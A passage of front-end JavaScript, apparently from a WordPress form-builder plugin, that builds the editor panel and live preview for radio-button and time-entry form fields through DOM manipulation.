	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_checkbox')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_checkbox')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_checkbox')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_checkbox')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var el_choices_label = document.createElement('label');
			        el_choices_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_choices_label.innerHTML = "Options ";

	
	var el_choices_add = document.createElement('img');
                el_choices_add.setAttribute("id", "el_choices_add");
           	el_choices_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_choices_add.style.cssText = 'cursor:pointer;';
            	el_choices_add.setAttribute("title", 'add');
                el_choices_add.setAttribute("onClick", "add_choise('radio',"+i+")");
				
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	

	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_label_flow);
	edit_main_td3_1.appendChild(el_flow_vertical);
	edit_main_td3_1.appendChild(Vertical);
	edit_main_td3_1.appendChild(br4);
	edit_main_td3_1.appendChild(el_flow_horizontal);
	edit_main_td3_1.appendChild(Horizontal);

	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_randomize_label);
	edit_main_td8_1.appendChild(el_randomize);
	
	edit_main_td9.appendChild(el_allow_other_label);
	edit_main_td9_1.appendChild(el_allow_other);
	edit_main_td10.appendChild(el_rowcol_label);
	edit_main_td10_1.appendChild(el_rowcol_textarea);
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	
	edit_main_td4.appendChild(el_choices_label);
	edit_main_td4_1.appendChild(el_choices_add);

	
	n=w_choices.length;
	for(j=0; j<n; j++)
	{	
		var br = document.createElement('br');
			br.setAttribute("id", "br"+j);
			
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_choices"+j);
			el_choices.setAttribute("type", "text");
      if (w_allow_other == "yes" && j == w_allow_other_num) {
        el_choices.setAttribute("other", '1');
      }
			el_choices.setAttribute("value", w_choices[j]);
			el_choices.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
			el_choices.setAttribute("onKeyUp", "change_label('"+i+"_label_element"+j+"', this.value); change_in_value('"+i+"_elementform_id_temp"+j+"', this.value)");
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
		if(w_allow_other=="yes" && j==w_allow_other_num)
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px; display:none';
		else			
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_choise("+j+","+i+",'radio')");
			
		edit_main_td4.appendChild(br);
		edit_main_td4.appendChild(el_choices);
		edit_main_td4.appendChild(el_choices_remove);
	
	}


	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
  edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
  edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	element='input';	type='radio'; 
		var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_radio");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
	    
	var adding_randomize = document.createElement("input");
            adding_randomize.setAttribute("type", "hidden");
            adding_randomize.setAttribute("value", w_randomize);
            adding_randomize.setAttribute("name", i+"_randomizeform_id_temp");			
            adding_randomize.setAttribute("id", i+"_randomizeform_id_temp");
	    
	var adding_allow_other= document.createElement("input");
            adding_allow_other.setAttribute("type", "hidden");
            adding_allow_other.setAttribute("value", w_allow_other);
            adding_allow_other.setAttribute("name", i+"_allow_otherform_id_temp");			
            adding_allow_other.setAttribute("id", i+"_allow_otherform_id_temp");
  var adding_rowcol= document.createElement("input");
            adding_rowcol.setAttribute("type", "hidden");
            adding_rowcol.setAttribute("value", w_rowcol);
            adding_rowcol.setAttribute("name", i+"_rowcol_numform_id_temp");			
            adding_rowcol.setAttribute("id", i+"_rowcol_numform_id_temp");
     var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
			
	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
	
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
//tbody sarqac		
		var table_little_t = document.createElement('table');
			
		var table_little = document.createElement('tbody');
           	table_little.setAttribute("id", i+"_table_little");
			
		table_little_t.appendChild(table_little);
	
      	var tr_little1 = document.createElement('tr');
	        tr_little1.setAttribute("id", i+"_element_tr1");
		
      	var tr_little2 = document.createElement('tr');
 	        tr_little2.setAttribute("id", i+"_element_tr2");
			
      	var td_little1 = document.createElement('td');
         	td_little1.setAttribute("valign", 'top');
           	td_little1.setAttribute("id", i+"_td_little1");
			
      	var td_little2 = document.createElement('td');
        	td_little2.setAttribute("valign", 'top');
           	td_little2.setAttribute("id", i+"_td_little2");
			

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
	n=w_choices.length;
	aaa=false;
	
	    
      	var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      	td1.appendChild(required);
       	td2.appendChild(adding_type);
	
       	td2.appendChild(adding_required);
       	td2.appendChild(adding_randomize);
       	td2.appendChild(adding_allow_other);
        td2.appendChild(adding_rowcol);
        td2.appendChild(table_little_t);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	if (w_field_label_pos == "top") {
    label_top(i);
  }
  change_class(w_class, i);
  refresh_attr(i, 'type_checkbox');
  if (aaa) {
    show_other_input(i);
  }
  refresh_rowcol(i, 'radio');
  add_id_and_name(i, 'type_radio');

}

function type_time(i, w_field_label, w_field_label_pos, w_time_type, w_am_pm, w_sec, w_hh, w_mm, w_ss, w_mini_labels, w_required, w_class, w_attr_name, w_attr_value) {
	
	document.getElementById("element_type").value="type_time";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
				el_label_position1.setAttribute("checked", "checked");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
		
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

	var el_label_time_type_label = document.createElement('label');
	        el_label_time_type_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_time_type_label.innerHTML = "Time Format";
	
	var el_label_time_type1 = document.createElement('input');
                el_label_time_type1.setAttribute("id", "el_label_time_type1");
                el_label_time_type1.setAttribute("type", "radio");
                el_label_time_type1.setAttribute("value", "format_24");
                el_label_time_type1.setAttribute("name", "edit_for_time_type");
                el_label_time_type1.setAttribute("onchange", "format_24("+i+")");
		el_label_time_type1.setAttribute("checked", "checked");
		hour_24 = document.createTextNode("24 hour");
		
	var el_label_time_type2 = document.createElement('input');
                el_label_time_type2.setAttribute("id", "el_label_time_type2");
                el_label_time_type2.setAttribute("type", "radio");
                el_label_time_type2.setAttribute("value", "format_12");
                el_label_time_type2.setAttribute("name", "edit_for_time_type");
                el_label_time_type2.setAttribute("onchange", "format_12("+i+", 'am','', '','')");
		am_pm = document.createTextNode("12 hour");
		
	if(w_time_type=="24")
	
				el_label_time_type1.setAttribute("checked", "checked");
	else
				el_label_time_type2.setAttribute("checked", "checked");

	var el_label_second_label = document.createElement('label');
	        el_label_second_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_second_label.innerHTML = "Display Seconds";
	
	var el_second_yes = document.createElement('input');
                el_second_yes.setAttribute("id", "el_second_yes");
                el_second_yes.setAttribute("type", "radio");
                el_second_yes.setAttribute("value", "yes");
                el_second_yes.setAttribute("name", "edit_for_time_second");
                el_second_yes.setAttribute("onchange", "second_yes("+i+",'"+w_ss+"')");
		el_second_yes.setAttribute("checked", "checked");
		display_seconds = document.createTextNode("Yes");
		
	var el_second_no = document.createElement('input');
                el_second_no.setAttribute("id", "el_second_no");
                el_second_no.setAttribute("type", "radio");
                el_second_no.setAttribute("value", "no");
                el_second_no.setAttribute("name", "edit_for_time_second");
                el_second_no.setAttribute("onchange", "second_no("+i+")");
		dont_display_seconds = document.createTextNode("No");
		
	if(w_sec=="1")
	
				el_second_yes.setAttribute("checked", "checked");
	else
				el_second_no.setAttribute("checked", "checked");
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_time')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_time')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_time')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_time')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_label_time_type_label);
	edit_main_td3_1.appendChild(el_label_time_type1);
	edit_main_td3_1.appendChild(hour_24);
	edit_main_td3_1.appendChild(br6);
	edit_main_td3_1.appendChild(el_label_time_type2);
	edit_main_td3_1.appendChild(am_pm);
	
	edit_main_td4.appendChild(el_label_second_label);
	edit_main_td4_1.appendChild(el_second_yes);
	edit_main_td4_1.appendChild(display_seconds);
	edit_main_td4_1.appendChild(br4);
	edit_main_td4_1.appendChild(el_second_no);
	edit_main_td4_1.appendChild(dont_display_seconds);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);

	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_time');
	
//show table
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_time");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
        var div_for_editable_labels = document.createElement('div');
			div_for_editable_labels.setAttribute("style", "margin-left:4px; color:red;");
			
      	edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");

		div_for_editable_labels.appendChild(edit_labels);
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'middle');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var table_time = document.createElement('table');
           	table_time.setAttribute("id", i+"_table_time");
           	table_time.setAttribute("cellpadding", '0');
           	table_time.setAttribute("cellspacing", '0');
      	var tr_time1 = document.createElement('tr');
           	tr_time1.setAttribute("id", i+"_tr_time1");
			
      	var tr_time2 = document.createElement('tr');
           	tr_time2.setAttribute("id", i+"_tr_time2");
			
      	var td_time_input1 = document.createElement('td');
           	td_time_input1.setAttribute("id", i+"_td_time_input1");
	        td_time_input1.style.cssText ="width:32px";
		
      	var td_time_input1_ket = document.createElement('td');
           	td_time_input1_ket.setAttribute("align", "center");
		
		
		
      	var td_time_input2 = document.createElement('td');
           	td_time_input2.setAttribute("id", i+"_td_time_input2");
 	        td_time_input2.style.cssText ="width:32px";
     	var td_time_input2_ket = document.createElement('td');
           	td_time_input2_ket.setAttribute("align", "center");
		
      	var td_time_input3 = document.createElement('td');
           	td_time_input3.setAttribute("id", i+"_td_time_input3");
 	        td_time_input3.style.cssText ="width:32px";

      	var td_time_label1 = document.createElement('td');
           	td_time_label1.setAttribute("id", i+"_td_time_label1");
      	var td_time_label1_ket = document.createElement('td');
      	var td_time_label2 = document.createElement('td');
           	td_time_label2.setAttribute("id", i+"_td_time_label2");
      	var td_time_label2_ket = document.createElement('td');
      	var td_time_label3 = document.createElement('td');
           	td_time_label3.setAttribute("id", i+"_td_time_label3");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

      	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
			
	var hh = document.createElement('input');
	hh.setAttribute("type", 'text');
	hh.setAttribute("value", w_hh);
	    hh.setAttribute("class", "time_box");
	    hh.setAttribute("id", i+"_hhform_id_temp");
	    hh.setAttribute("name", i+"_hhform_id_temp");
	    hh.setAttribute("onKeyPress", "return check_hour(event, '"+i+"_hhform_id_temp', '23')");
	    hh.setAttribute("onKeyUp", "change_hour(event, '"+i+"_hhform_id_temp','23')");
	    hh.setAttribute("onBlur", "add_0('"+i+"_hhform_id_temp')");
			
	var hh_label = document.createElement('label');
	    hh_label.setAttribute("class", "mini_label");
	    hh_label.setAttribute("id", i+"_mini_label_hh");
	    hh_label.innerHTML = w_mini_labels[0];
			
	var hh_ = document.createElement('span');
        hh_.setAttribute("class", 'wdform_colon');
	    hh_.style.cssText = "font-style:bold; vertical-align:middle";
	    hh_.innerHTML="&nbsp;:&nbsp;";
		
	var mm = document.createElement('input');
        mm.setAttribute("type", 'text');
		mm.setAttribute("value", w_mm);
		mm.setAttribute("class", "time_box");
		
		mm.setAttribute("id", i+"_mmform_id_temp");
	    	mm.setAttribute("name", i+"_mmform_id_temp");
		mm.setAttribute("onKeyPress", "return check_minute(event, '"+i+"_mmform_id_temp')");
	        mm.setAttribute("onKeyUp", "change_minute(event, '"+i+"_mmform_id_temp')");
		mm.setAttribute("onBlur", "add_0('"+i+"_mmform_id_temp')");
		
	var mm_label = document.createElement('label');
